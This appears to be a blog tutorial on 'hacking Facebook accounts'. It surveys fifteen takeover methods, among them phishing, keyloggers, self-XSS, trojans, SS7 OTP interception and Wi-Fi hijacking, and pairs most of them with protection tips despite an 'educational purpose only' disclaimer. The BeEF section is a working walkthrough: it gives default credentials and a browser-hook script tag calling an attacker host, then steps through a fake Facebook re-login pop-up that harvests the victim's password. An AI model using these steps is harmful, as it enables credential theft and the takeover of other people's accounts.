Hack Facebook Account

Nowadays every third person who uses facebook has the question that “how to hack facebook account?“Well This question revolves around the globe. So we decided to create this tutorial which is made 100% for educational purpose only for the beginners that let you hack facebook account of or any other online accounts like Gmail,twitter,Instagram or yahoo or you may say that this tutorial as an educational tutorial will help you to recover your own or your family or friends hacked accounts and will prevent hackers from hacking your facebook account.
List of techniques that can hack facebook accounts

Phishing Guide To Hack Facebook Account
Social Engineering Guide To Hack Facebook Account
Password Grabbing Technique To Hack Facebook Account
Keylogger Guide To Hack Facebook Account
Browser Extensions To Hack Facebook Account
Malicious Facebook App To Hack Facebook Account
Browser Vulnerability can lead to Hack Facebook Account
Self-XSS Scam To Hack Facebook Account
Trojan Horses To Hack Facebook Account
Facebook Zero Day Guide To Hack Facebook Account
Hacking Facebook Account by knowing just phone number
How to hack facebook account using Beef in Kali Linux
Using Source Code to hack facebook account
Tabnapping to hack facebook account
Hack Facebook Account via Hacking Lan or Wifi

1.Phishing Guide To Hack Facebook Account

Phishing is the most common technique used for hacking Facebook passwords. It is easy for anyone who is having a little technical knowledge to get a phishing page done and that is why phishing is so popular. Many people become a victim of Phishing page due to its trustworthy layout and appearance.

Phishing pages are easy to make just go to the website you are making a phishing page and then by clicking the second click and copy the source code and paste in into a file index.html.This is not a phishing tutorial so we are not doing all that phishing site creation lets move on to the tutorial of hacking a facebook account.

How can phishing hack facebook accounts?

In simple words, phishing is a process of creating a duplicate copy of a reputed website’s page with the intention of stealing user’s password or other sensitive information like credit card details. In our topic, Creating a page which perfectly looks like Facebook login page but in a different URL like fakebook.com or faecbook.com or any URL which pretends to be legit.

When a user lands on such page, he/she might think that is real Facebook login page and ask them to provide their username and password. So the people who don’t find phishing page suspicious might enter their username, password, and the password information would be sent to the hacker/attacker who created the phishing page, simultaneously the victim would get redirected to the original Facebook page.

Example : John is a programmer, he creates a Facebook login page with some scripts to enable him to get the username and password information and put it in https://www.facebouk.com/make-money-online-tricks. Peter is a friend of John. John sends a message to Peter “Hey Peter, I found a way to make money online easily you should definitely take a look at this https://www.facebouk.com/make-money-online-tricks”.

Peter navigate to the link and see a Facebook login page. As usual, Peter enters his username and password of Facebook. Now the username and password of Peter were sent to John and Peter get redirected to a money making tips page https://www.facebouk.com/make-money-online-tricks-tips.html. That’s all Peter’s Facebook account is hacked.

How could you protect yourself from Facebook phishing?

Hackers can reach you in many ways like email, personal messages, Facebook messages, Website ads etc. Clicking any links from these messages would lead you to be hacked. Whenever you find a Facebook login page, you should note only one thing which isURL because nobody can use Facebook URL except when there are some XSS zero-day vulnerabilities but that’s very rare case scenario.

What is the URL you see in browser address bar?
Is that really https://www.facebook.com?
Is there any Green color secure symbol (HTTPS) provided in the address bar?

Keeping these questions in your mind would prevent you from getting hacked of phishing. Also, see the below examples of phishing pages.

Some perfectly looking phishing pages are listed below.


Facebook Phishing Page – Note the misleading URL

Most of the people won’t suspect this page (snapshot given above) since there is https prefix with the green color secure icon and no mistake in www.facebook.com. But this is a phishing page how? Note the URL correctly. It is https://www.facebook.com.infoknown.comso www.facebook.com is a subdomain of infoknown.com.

Google Chrome don’t differentiate the sub-domain and domain unlike Firefox does. SSL Certificates (HTTPS) can be obtained from many vendors, few vendors give SSL Certificate for Free for 1 year. It’s not a big deal for a novice to create a perfect phishing page like this. So be aware of it.

Facebook Phishing Page – Note the misleading URL

This is a normal Facebook Phishing page with some modification in the word Facebook.

2.Social Engineering Guide To Hack Facebook Account

This is the second most common technique to hack Facebook account. Actually, this method shouldn’t come under Hacking since there is no much knowledge required for this method. I am listing this method under hacking to ensure the list of most common techniques used to hack facebook account in their respective order.

Social engineering is basically a process of gathering information about someone whose account you need to hack. Information like date of birth, their mobile number, their boyfriend / girlfriend’s mobile number, nickname, mother’s name, native place etc.

How Social Engineering works?

Social Engineering is a simple process in some cases it works same like phishing and some others it does not so here is the common example of the social engineering.Like many of the social engines and many other sites facebook also have a password reset mechanism by using a security question which leads to hack facebook account.Let’s just check the Process Below

Social Engineering Security Question Method

Facebook-Social-Engineering-Security-Question

Many websites have a common password reset option called Security Question. Most common security questions would be “What is your nickname?” , “What is your 10th-grade score?” , “What is your native place?” or any custom questions defined by a user.

Obtaining this information from the respective people might let us hack into their account. Facebook also provides security question as password recovery option. So if anyone got to know the answer to it, they could hack your account using forgot password option.

Most Common and Weak Passwords

Security Question does not let you get into others Facebook account easily. But setting a weak password would easily allow any of your friends to hack into your account. What is a weak password in this scenario? The password which can be easily guessed by a third person is called weak password. Below are some of the most common passwords people tend to use on Facebook.

Mobile Number
Nickname / Name and Date of Birth Conjunction
Boy Friend’s / Girl Friend’s Mobile Number – Most of the lovers ?
Boy Friend’s / Girl Friend’s Name – Most of the lovers ?
Boy Friend and Girl Friend Name Combination
Bike Number
Unused / Old Mobile Number
Pet Name
Closest Person Name (can be friends too)

Now be honest and comment here if you are one of the people who have any one of the common passwords stated above. Don’t forget to change your password before making a comment ?

How could you protect yourself from Social Engineering?

Choose the Strong Security Question

Don’t have a weak or familiar security question/answer. It should be known only to you. You can set your Facebook security question here. Facebook also have an option called “Login Alerts” under Facebook Security Settings, you should add your mobile or email there to get notified whenever your Facebook account is logged into a new or unknown device.

Choose a strong Password for your Accounts

Very simple. Change your Facebook password now if you have any one of the weak passwords stated above.

Social Engineering is evolving ever since this technique has been used to hack facebook accounts.Now there are a specific set of tools to hack facebook account using social engineering.Almost every hacker uses Kali Linux.And In Kali Linux, there is pre-configured social engineering toolkit which has tools and scripts for the main purpose of social engineering.

These tools are surely very powerful and automatic which makes the social engineering process really simple to hack facebook accounts or any other sites account.

3.Password Grabbing Technique To Hack Facebook Account

This is another common method used to steal Facebook user’s password. Most people are unaware of these method but traditional hackers use this method to get many users email and password.

How Plain Password Grabbing can hack facebook account?

In this method, the hacker / attacker would target a particular low-quality website where the victim is a member and hack their database to get the stored plain username & password of victim. Here how could the attacker get access to Facebook? Many of us use the same password for Facebook and some poorxyz.com so it’s easy for a hacker to get your password through the low-quality poorxyz.com

In another scenario, the hacker / attacker would create a website with the intention of getting users password. Whenever a user signup or register his account using email and create a password and those details would be stored in their DB. So they get your email and password. Common people who use same email and password for this kind of low-quality websites would end up getting their Facebook account hacked.

How could you protect yourself from Facebook Plain Password Grabbing?

You should never trust third party low-quality websites, even popular websites like Linkedin passwords are getting hacked. So never ever trust third party low-quality websites. Most of the website developers are storing plain passwords in a database without even thinking about encryption or security.

This makes hackers job easy since the password is stored as plain text. The best way to prevent this method is to have a unique password at least for websites you really trust. Don’t use your Facebook password for any other website/portal and that’s when your password would never get exposed.

4.Keylogger Guide To Hack Facebook Account

A keylogger is a software tool used to record keystrokes of a computer. This, in turn, records everything you type using your keyboard and store it for use.

How Key Logging can hack your facebook account?

Most keyloggers run in the background and won’t be viewable to users until you know the keylogger password and shortcut used to view it. It would record all the keys pressed and give you a detailed report of when and what keys are used for what application. Anyone who is reading the keylogger logs would know the Facebook password or any passwords typed and sensitive information like credit cards, bank username password etc.

Whenever you log in to a public computer, there are chances for you to get your password hacked. In another scenario, your friend/colleague/neighbor could ask you to log in using their computer as a help. If their intention is to get your password then you are most likely to get your Facebook account hacked.

How could you protect yourself from Key Logging?

You need not be afraid of keyloggers when you use your personal computer since you are the only one who is going to access it. But whenever you use any public computer or any of your friend’s computer, you should not trust it. I always suggest my friends to use On-Screen Keyboard whenever they are in need to type a password, also please make sure nobody is checking your screen while you type your password since your screen would expose what you typed.

In windows, there is an inbuilt tool called On Screen Keyboard which helps us to select keys using the mouse. You can open OSK by using Run dialog box.WinKey + R opens Run dialog box, type ok and then press enter. Nowadays many banking portals provide a screen keyboard in the browser itself. So please make use of it whenever you are surfing on public computers.

5.Browser Extensions To Hack Facebook Account

This method doesn’t let the hacker / attacker give complete access to your Facebook account but gives some power to control your account indirectly. I’ve seen multiple Google Chrome and Firefox add-ons which hiddenly perform actions like following a person, liking a page on behalf of your Facebook profile.

How can browser extension hack facebook accounts?

When you visit some malicious websites or web pages, you will be prompted to install a browser add-on. Once you install the addon, it would perform all the tasks described by hacker or attacker who created it. Most actions are posting status updates on your wall, liking a Facebook page, following a person, adding you to some Facebook groups, inviting your friends to like a page or join a Facebook group etc. You may not know these things happening in your Facebook account except when you check your Facebook activity log periodically.

How could you prevent browser extension Facebook hack?

You can monitor your activities using a Facebook feature called Activity Log. You should not trust any third party websites prompting you to add a browser extension. Install add-ons only if you trust the publisher. Why should you take a risk if you don’t know the publisher or intention of the addon? Stay from those malicious browser extensions.

6.Malicious Facebook App To Hack Facebook Account

All the apps you use in Facebook are owned by the third party and not by Facebook. Of course, there are few exceptions like Instagram. A malicious application which is requesting your permission could do almost all kind of stuff on your Facebook profile.

How malicious Facebook application hack works?

Whenever you find Login using a Facebook option on any website, you should come to know that it is a third party Facebook application not owned by Facebook. When you click Login using Facebook, you will be shown a permission dialog box with the requested permission details. Once you click okay button, the requested details can be accessed from Facebook or the requested actions can be performed in your Facebook account.

What could a third party application do in your Facebook account?

Post photos and status update
Share link to your timeline or to any group you belong
Manage your page
Post on behalf of you on the Facebook pages you own
Access your personal information
Access your photos including “Only me” privacy photos, sometimes they can access your mobile photos using a Facebook vulnerability

These are just examples of what could be done. What if the application you are using is malicious? It could spam your Facebook account with the bunch of worthless content.

How could you prevent yourself from malicious Facebook application hack?

You should always be aware of what permissions you give to a Facebook application even though Facebook is reviewing application’s permission requests. Don’t give permission to an application if you don’t trust the website or application.

You can edit the information you give to an application in the permission dialog box (snapshot given above). Also, you can review the applications that have access to your Facebook account here.

7.Browser Vulnerability can lead to Hack Facebook Account

Browser Vulnerabilities are security bugs which exist in older versions of mobile and desktop browsers.

How did browser vulnerabilities work in Facebook hacking?

Most browser vulnerabilities are exploited through an older version of the browser since all of the zero days are patched by browser vendor once it is reported by researchers around the world. For example, Browser Same Origin Policy Vulnerability could allow an attacker to read the response of any Page like Facebook and could be able to perform any action in your Facebook account since they are able to read the response by accessing the Facebook origin.Android Chrome SOP bypass by Rafay Baloch is one such vulnerability which is affecting Android web view in Android < 4.4.

How could you prevent yourself from browser vulnerabilities?

You should always update your browser and operating system once there is an updated version available. Keeping an older version always have many risk factors involved.

8.Self-XSS Scam To Hack Facebook Account

Self-XSS also was known as Self Cross Site Scripting. XSS is basically a web security vulnerability, it enables hackers to inject scripts into web pages used by other users. What is self-XSS then? Self-XSS is a kind of social engineering attack where a victim accidentally executes a script, thus exploiting to the hacker.

How Facebook self-XSS scam can hack your facebook account?

In this method, hacker promises to help you hack somebody else’s Facebook account. Instead of giving you access to someone else’s account, the hacker tricks you into running malicious Javascript in your browser console that gives the hacker the ability to manipulate your account. Most hackers use this technique to add you in groups, add your friends to group, post on your wall, add your friends in comments etc.

How could you prevent yourself from self-XSS?

Self-XSS is something that you let hackers hack your account ? Never and ever copy & paste the code given by someone in your browser. Otherwise, you would get your Facebook account hacked.

9.Trojan Horses To Hack Facebook Account

Trojan or Trojan Horse is a malicious program which is used to spy and control a computer by misleading users of its true intent. Trojan can also be stated as Remote Key Logger since it records keystrokes of all the applications of our computer and sends it to the attacker.

How can Trojan Horse hack facebook accounts?

A software you think legit might be a trojan. A PDF you don’t suspect might contain a trojan. An avid media file you have might be a trojan. Trojan horses run in the background process, collect information and send it to a hacker. Trojan horses can be sent in any form through any medium like pen drive, iPod, website or email. In our topic, Trojan records Facebook password you typed in your browser and send it to the hacker using the Internet.

How could you prevent yourself from Trojan?

Don’t install programs from unknown source.
Don’t play media files received from an unknown source.
Don’t open any kind of files downloaded from untrusted sources.
Don’t insert pen drive from any suspicious people.
Has an updated anti-virus software installed on your computer?

Having an updated anti-virus software does not guarantee you to not getting hacked. Basically, an anti-virus software is a collection of detected malware and viruses. Its job is to compare each and every file with their database of viruses. There is much software which enables us to create undetectable trojans. But it is very unlikely to target a common man with undetectable trojan ware. So having an updated antivirus program somewhat helps us.

10.Facebook Zero Day’s To Hack Facebook Account

Zero day is a security vulnerability that is unknown to the respective software vendor. In our context, Undiscovered Facebook vulnerabilities are called Facebook Zero Day.

How Facebook Zero Day hacking works?

Facebook zero-day vulnerabilities are very rare since Facebook runs a bug bounty program where security researchers around the world participate and report zero-day vulnerabilities. It is basically a security loophole that is unaware to Facebook. It can be any hack affecting Facebook. There are two types of people who find zero-day vulnerabilities.

The first case is Security Researchers and Bug hunters who make a responsible disclosure about the vulnerability to the software vendor, Facebook in our context. Another case falls under evil side, black hat hackers who find zero-day vulnerabilities don’t disclose it to Facebook and they will use it for their personal benefit of hacking.

How could you prevent yourself from Zero Day?

You can’t if a hacker is coming after you by a zero day hack. But you need not be afraid of a zero-day vulnerability affecting Facebook. As I have said earlier, zero-day vulnerabilities are very rare. Zero-day vulnerabilities are targeted to influential people and celebrities. It is unlikely to target a common man using a zero-day vulnerability.

11.Hacking Facebook Account by knowing just phone number

Researchers have proven just that by taking control of a Facebook account with only a phone number and some hacking skills to exploit the SS7 network, a core piece of telecoms infrastructure shown to be vulnerable repeatedly over the last half decade.

The hackers exploit a flaw in the SS7 protocol for hacking Facebook accounts just by knowing a victim’s phone number. The technique allows bypassing any security measure implemented by the giant of the social networks.

SS7 is a set of protocols used in telecommunications ever since the late 1970s, enabling smooth transportation of data without any breaches.The attack method devised by the experts from Positive Technologies works against any service that relies on SMS to verify the user accounts, including Gmail and Twitter,telegram and WhatsApp.

How SS7 Attack can Hack Facebook Accounts

Hacking Facebook accounts is a reality, the attacker first needs to follow the “Forgot account?” procedure by clicking on a link present in the Facebook homepage. At this point, when asked for a phone number or email address belonging to the target account, the hacker needs to provide the legitimate phone number.

At this point, the attacker can exploit the flaw in the SS7 to hijack the SMS containing a one-time passcode (OTP) that is used to log in the target’s Facebook account.

Hacking Facebook accounts are possible only if users have registered a phone number and have authorized Facebook Texts.

How to prevent SS7 Attack from hacking your facebook account

To protect your facebook account do not link your phone number to social media sites, instead use emails for the recovery process. Always enable two-factor authentication that uses email instead SMS texts for receiving passcodes.

12.How to hack facebook account using Beef in Kali Linux

Open Beef

Beef is an application that runs in the background on a web server on your system that you access from a browser. Once beef is up and running, open your Iceweasel browser to access its interface. You can login to beef by using the username beef and the password beef.

You will then by greeted by beef’s”Getting Started” screen.

Hook the Victim’s Browser

This is the most critical maybe even the most difficult part of this hack. You must get the victim to click on a specially designed JavaScript link to “hook” their browser. This can be done in innumerable ways.

The simplest way is to simply embed the code into your website and entice the user to click on it. This might be done by such text as “Click here for more information” or “Click here to see the video.” Use your imagination.

The script looks something like below. Embed it into a web page, and when someone clicks on it, you own their browser! (Comment below if you have any questions on this; You might also use the MitMf to send the code to the user, but this requires more skill but the result of the MITMf is 100%.

<script src= “http://192.168.1.101:3000/hook.js&#8221 ; type= “text/javascript” ></script>

From here, I will be assuming you have “hooked” the victim’s browser and are ready to own it.

Send a Dialog Box to the User

When you have hooked the victim’s browser, its IP address, along with the operating system and browser type icons, will appear in the “Hooked Browsers” panel on the left. Here, I have simply used my own browser to demonstrate.

If we click on the hooked browser, it opens a BeEF interface on the right side. Notice that it gives us the details of the browser initially. It also provides us with a number of tabs. For our purposes here, we are interested in the ‘Commands” tab.

Click on the “Commands” tab, then scroll down the “Modules Tree” until you come to “Social Engineering” and click to expand it. It will display numerous social engineering modules. Click on “Pretty Theft,” which will open a “Module Results History” and “Pretty Theft” window.

This module enables you to send a pop-up window in the user’s browser. In our case, we will be using the Facebook dialog box.

If we click on the “Dialog Type” box, we can see that this module can not only create a Facebook dialog box, but also a LinkedIn, Windows, YouTube, Yammer, and a generic dialog box. Select the Facebook dialog type,then click on the “Execute” button the bottom.

The Dialog Box Appears on the Victim System

When you click “Execute” in BeEF, a dialog box will appear in the victim’s browser like that below. It tells the victim that their Facebook session has expired and they need to re-enter their credentials.

Although you may be suspicious of such a pop-up box, most users will trust that their Facebook session expired and will simply enter their email and password in.

and that’s it when the user enters its password they in the box you will be able to get the facebook password in the beef command panel and you have hacked a facebook account.

Note for beef hacking techniqueUsing beef to hack facebook account works only in the lan.You can’t hack a facebook account in wan unless you have a way to hooked his computer with this script but that won’t be easy.

13.Using Source Code to hack facebook account

At facebook website login pages, you can view masked passwords with “******” by changing the password input type as text from inspect element in your browser. This method works in all modern browser. Never leave your PC on with signup page. Anyone can know your facebook password from this method if you have saved the password in the browser.

How to Save yourself from this Attack

Never save your facebook password in your web browser.

14.Tabnapping to hack facebook account

This method is very effective as every site has a one click sign up activated using a facebook api with which an attacker can trick you into signing up on a site made by him and his app will let him do whatever the hell he want with your account.

How tab-napping works to hack a facebook account

As You can signup and make your id on any website from your facebook account. In this hack, the hacker creates a fake website and asks a user to sign up.

A hacker can also create a fake game website and asks a user to sign up for play more. If you enter your facebook username and password , that mean you are being hacked.

How to Protect yourself from Tabnapping

Avoid signup from facebook account, always use trusted websites.
Avoid spyware and freeware software.
Never play free games on untrusted websites.

15.Hack Facebook Account via Hacking Lan or Wifi

Hackers hack your wifi network if you use the weak password in your router security. Once they hacked your wifi network they easily hack your computer. An attacker can Hijack your all internet traffic and they easily can hack your facebook account password.

Prevent yourself from Wifi Hacking

Never use free wifi or Public wifi.
In Public wifi always use VPN to encrypt traffic.
Always use WPA-2 security with PIN.
Change your wifi password once in two days.

Conclusion

These are the Methods that can hack facebook account 100% til September 2016.But Who knows about future may be hackers will create new methods with more success rate.We will end this tutorial here but we will continue to update this list as we found any other method I know I did not mention MITM attack but they really don’t work with SSL so I think that they are good not to be mentioned here in the list of methods that can hack facebook account.if you have any query about these methods or have a new facebook account hacking method in mind just ping us in comments.

Dapatkan Tips Menarik Setiap Harinya!

Dapatkan tips dan trik yang belum pernah kamu tau sebelumnya
Jadilah orang pertama yang mengetahui hal-hal baru di dunia teknologi
Dapatkan Ebook Gratis: Cara Dapat 200 Juta / bulan dari AdSense

How to hack facebook account (Best 15 insane Methods to hack facebook)